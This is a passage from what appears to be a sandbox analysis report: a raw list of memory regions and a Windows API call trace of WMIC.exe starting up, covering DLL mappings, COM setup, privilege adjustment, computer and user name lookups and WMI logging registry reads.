end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4502 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4503 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4504 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4505 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4506 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 4507 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4508 start_va = 0x7fb20000 end_va = 0x7fc1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fb20000" filename = "" Region: id = 4509 start_va = 0x7fc46000 end_va = 0x7fc48fff entry_point = 0x0 region_type = private name = "private_0x000000007fc46000" filename = "" Region: id = 4510 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4511 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e20000" filename = "" Region: id = 4512 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 4513 start_va = 0xf90000 end_va = 0xf90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f90000" filename = "" Region: id = 4514 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 4515 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 4516 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 4517 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 4518 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4519 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4520 start_va = 0x11f0000 end_va = 0x12d8fff entry_point = 0x11f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4521 start_va = 0x1160000 end_va = 0x1163fff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 4522 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 4523 start_va = 0x56b0000 end_va = 0x57effff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 4524 start_va = 0x57f0000 end_va = 0x59bffff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 4525 start_va = 0x57f0000 end_va = 0x59affff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 4526 start_va = 0x59b0000 end_va = 0x59bffff entry_point = 0x0 region_type = private name = "private_0x00000000059b0000" filename = "" Region: id = 4527 start_va = 0x57f0000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 4528 start_va = 0x59a0000 end_va = 0x59affff entry_point = 0x0 region_type = private name = "private_0x00000000059a0000" filename = "" Region: id = 4529 start_va = 0x11f0000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4530 start_va = 0x56b0000 end_va = 0x578efff entry_point = 0x56b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 4531 start_va = 0x57e0000 end_va = 0x57effff entry_point = 0x0 region_type = private name = "private_0x00000000057e0000" filename = "" Region: id = 4532 start_va = 0x59c0000 end_va = 0x5dbffff entry_point = 0x0 region_type = private name = "private_0x00000000059c0000" filename = "" Region: id = 4533 start_va = 0x1170000 end_va = 0x1170fff entry_point = 0x1170000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 4534 start_va = 0x1180000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 4535 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4536 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4537 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4538 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4539 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4540 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4541 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4542 start_va = 0x11a0000 end_va = 0x11c9fff entry_point = 0x11a0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4543 start_va = 0x5dc0000 end_va = 0x5f47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005dc0000" filename = "" Region: id = 4544 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4545 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4546 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x11a0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 4547 start_va = 0x5f50000 end_va = 0x60d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005f50000" filename = "" Region: id = 4548 start_va = 0x60e0000 end_va = 0x74dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000060e0000" filename = "" Region: id = 4549 start_va = 0x11b0000 end_va = 0x11b0fff entry_point = 0x0 region_type = private name = "private_0x00000000011b0000" filename = "" Region: id = 4550 start_va = 0x11c0000 end_va = 0x11c0fff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 4551 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4552 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4553 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 4554 start_va = 0x57f0000 end_va = 0x588ffff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 4555 start_va = 0x5950000 end_va = 0x595ffff entry_point = 0x0 region_type = private name = "private_0x0000000005950000" filename = "" Region: id = 4556 start_va = 0x11d0000 end_va = 0x11d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 4557 start_va = 0x5890000 end_va = 0x5947fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005890000" filename = "" Region: id = 4558 start_va = 0x11d0000 end_va = 0x11d3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 4559 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 4560 start_va = 0x74e0000 end_va = 0x75dffff entry_point = 0x0 region_type = private name = "private_0x00000000074e0000" filename = "" Region: id = 4561 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 4562 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 4563 start_va = 0x11f0000 end_va = 0x122ffff entry_point = 0x0 region_type = private name = "private_0x00000000011f0000" filename = "" Region: id = 4564 start_va = 0x1230000 end_va = 0x126ffff entry_point = 0x0 region_type = private name = "private_0x0000000001230000" filename = "" Region: id = 4565 start_va = 0x1270000 end_va = 0x127ffff entry_point = 0x0 region_type = private name = "private_0x0000000001270000" filename = "" Region: id = 4566 start_va = 0x1280000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x0000000001280000" filename = "" Region: id = 4567 start_va = 0x12c0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 4568 start_va = 0x5790000 end_va = 0x57cffff entry_point = 0x0 region_type = private name = "private_0x0000000005790000" filename = "" Region: id = 4569 start_va = 0x57f0000 end_va = 0x582ffff entry_point = 0x0 region_type = private name = "private_0x00000000057f0000" filename = "" Region: id = 4570 start_va = 0x5880000 end_va = 0x588ffff entry_point = 0x0 region_type = private name = "private_0x0000000005880000" filename = "" Region: id = 4571 start_va = 0x7fb1a000 end_va = 0x7fb1cfff entry_point = 0x0 region_type = private name = "private_0x000000007fb1a000" filename = "" Region: id = 4572 start_va = 0x7fb1d000 end_va = 0x7fb1ffff entry_point = 0x0 region_type = private name = "private_0x000000007fb1d000" filename = "" Region: id = 4573 start_va = 0x7fc43000 end_va = 0x7fc45fff entry_point = 0x0 region_type = private name = "private_0x000000007fc43000" filename = "" Region: id = 4574 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 4575 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 4576 start_va = 0x5830000 end_va = 0x5844fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005830000" filename = "" Region: id = 4577 start_va = 0x5830000 end_va = 0x5858fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005830000" filename = "" Thread: id = 302 os_tid = 0x9cc [0119.552] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0119.553] __set_app_type (_Type=0x1) [0119.553] __p__fmode () returned 0x77ac4d6c [0119.553] __p__commode () returned 0x77ac5b1c [0119.553] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0119.553] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0119.553] ??0CHString@@QAE@XZ () returned 0x13495ec [0119.553] ??0CHString@@QAE@XZ () returned 0x13498fc [0119.553] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0119.553] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0119.553] _onexit (_Func=0x1340a20) returned 0x1340a20 [0119.553] _onexit (_Func=0x1340a30) returned 0x1340a30 [0119.554] _onexit (_Func=0x1340a50) returned 0x1340a50 [0119.554] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.554] ResolveDelayLoadedAPI () returned 0x770fcd50 [0119.554] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0119.555] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0119.560] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xfa74f8) returned 0x0 [0119.570] GetCurrentProcess () returned 0xffffffff [0119.570] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xecfc00 | out: TokenHandle=0xecfc00*=0x158) returned 1 [0119.570] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xecfbfc | out: TokenInformation=0x0, ReturnLength=0xecfbfc) returned 0 [0119.570] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x11e3a38, TokenInformationLength=0x118, ReturnLength=0xecfbfc | out: TokenInformation=0x11e3a38, ReturnLength=0xecfbfc) returned 1 [0119.570] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x11e3a38*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0119.570] CloseHandle (hObject=0x158) returned 1 [0119.570] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.572] _vsnwprintf (in: _Buffer=0x11e3ac8, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xecfb88 | out: _Buffer="ms_409") returned 6 [0119.572] GetComputerNameW (in: lpBuffer=0x11e3b10, nSize=0xecfbec | out: lpBuffer="LHNIWSJ", nSize=0xecfbec) returned 1 [0119.572] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.572] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.573] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0119.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xecfc00 | out: lpNameBuffer=0x0, nSize=0xecfc00) returned 0x0 [0119.573] GetLastError () returned 0xea [0119.573] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x11e3b38, nSize=0xecfc00 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xecfc00) returned 0x1 [0119.574] lstrlenW (lpString="") returned 0 [0119.574] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.574] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0119.575] lstrlenW (lpString=".") returned 1 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0119.575] lstrlenW (lpString="LOCALHOST") returned 9 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] lstrlenW (lpString="LHNIWSJ") returned 7 [0119.575] ResolveDelayLoadedAPI () returned 0x77bb9840 [0119.577] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.577] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.577] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.577] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.577] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.577] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.577] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.577] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.577] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.577] SysStringLen (param_1="IMPERSONATE") returned 0xb [0119.577] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.577] SysStringLen (param_1="IDENTIFY") returned 0x8 [0119.577] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.577] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.577] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0119.577] SysStringLen (param_1="DELEGATE") returned 0x8 [0119.577] SysStringLen (param_1="NONE") returned 0x4 [0119.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.577] SysStringLen (param_1="NONE") returned 0x4 [0119.577] SysStringLen (param_1="CONNECT") returned 0x7 [0119.577] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.578] SysStringLen (param_1="CALL") returned 0x4 [0119.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.578] SysStringLen (param_1="CALL") returned 0x4 [0119.578] SysStringLen (param_1="CONNECT") returned 0x7 [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="NONE") returned 0x4 [0119.578] SysStringLen (param_1="NONE") returned 0x4 [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="NONE") returned 0x4 [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.578] SysStringLen (param_1="DEFAULT") returned 0x7 [0119.578] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.578] SysStringLen (param_1="PKT") returned 0x3 [0119.578] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0119.578] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0119.578] GetSystemDirectoryW (in: lpBuffer=0x11e29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0119.579] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0119.579] SysStringLen (param_1="\\wbem\\") returned 0x6 [0119.579] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0119.579] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0119.579] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0119.579] GetCurrentThreadId () returned 0x9cc [0119.579] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xecf710 | out: phkResult=0xecf710*=0x164) returned 0x0 [0119.579] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xecf71c, lpcbData=0xecf718*=0x400 | out: lpType=0x0, lpData=0xecf71c*=0x30, lpcbData=0xecf718*=0x4) returned 0x0 [0119.579] _wcsicmp (_String1="0", _String2="1") returned -1 [0119.579] _wcsicmp (_String1="0", _String2="2") returned -2 [0119.579] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xecf718*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xecf718*=0x42) returned 0x0 [0119.579] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x11e2be0, lpcbData=0xecf718*=0x42 | out: lpType=0x0, lpData=0x11e2be0*=0x25, lpcbData=0xecf718*=0x42) returned 0x0 [0119.579] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0119.579] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0119.579] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xecf71c, lpcbData=0xecf718*=0x400 | out: lpType=0x0, lpData=0xecf71c*=0x36, lpcbData=0xecf718*=0xc) returned 0x0 [0119.579] _wtol (_String="65536") returned 65536 [0119.579] RegCloseKey (hKey=0x0) returned 0x6 [0119.579] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xecfbb0 | out: ppv=0xecfbb0*=0x57e45a8) returned 0x0 [0119.589] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x57e45a8, xmlSource=0xecfb30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xecfb94 | out: isSuccessful=0xecfb94*=0xffff) returned 0x0 [0119.632] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x57e45a8, DOMElement=0xecfba8 | out: DOMElement=0xecfba8) returned 0x0 [0119.633] SysStringLen (param_1="VALUE") returned 0x5 [0119.633] SysStringLen (param_1="TABLE") returned 0x5 [0119.633] SysStringLen (param_1="TABLE") returned 0x5 [0119.633] SysStringLen (param_1="VALUE") returned 0x5 [0119.633] SysStringLen (param_1="LIST") returned 0x4 [0119.633] SysStringLen (param_1="TABLE") returned 0x5 [0119.633] SysStringLen (param_1="RAWXML") returned 0x6 [0119.634] SysStringLen (param_1="TABLE") returned 0x5 [0119.634] SysStringLen (param_1="RAWXML") returned 0x6 [0119.634] SysStringLen (param_1="LIST") returned 0x4 [0119.634] SysStringLen (param_1="LIST") returned 0x4 [0119.634] SysStringLen (param_1="RAWXML") returned 0x6 [0119.634] SysStringLen (param_1="HTABLE") returned 0x6 [0119.634] SysStringLen (param_1="TABLE") returned 0x5 [0119.634] SysStringLen (param_1="HTABLE") returned 0x6 [0119.634] SysStringLen (param_1="LIST") returned 0x4 [0119.634] SysStringLen (param_1="HFORM") returned 0x5 [0119.634] SysStringLen (param_1="TABLE") returned 0x5 [0119.634] SysStringLen (param_1="HFORM") returned 0x5 [0119.634] SysStringLen (param_1="LIST") returned 0x4 [0119.634] SysStringLen (param_1="HFORM") returned 0x5 [0119.634] SysStringLen (param_1="HTABLE") returned 0x6 [0119.635] SysStringLen (param_1="XML") returned 0x3 [0119.635] SysStringLen (param_1="TABLE") returned 0x5 [0119.635] SysStringLen (param_1="XML") returned 0x3 [0119.635] SysStringLen (param_1="VALUE") returned 0x5 [0119.635] 